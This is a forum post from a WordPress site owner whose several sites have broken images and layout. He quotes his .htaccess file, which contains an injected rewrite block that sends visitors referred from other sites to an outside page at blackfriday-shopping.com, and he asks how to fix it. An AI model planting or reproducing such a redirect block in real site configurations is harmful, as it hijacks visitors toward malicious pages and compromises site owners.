Hi guys,
I have a few websites under one hosting, and they are all wordpress-based. I just checked yesterday that all of my websites have broken images and layout, you can see them here;
http://www.jimannajmi.com
http://www.alpha-lipid.org
http://www.hanifazman.com
http://www.justinbridle.com
http://www.perodua-baru.com
I checked the .htaccess files, and they all have the same lines;
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://blackfriday-shopping.com/mhhi.html?h=1260301 [L,R]
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
I dont know where the line "http://blackfriday-shopping.com/mhhi.html?h=1260301" comes from, but I suspect it's the source of the problem. I've tried deleted the lines but the problem persist. Please advise me on what to do.
Thanks.
-Jiman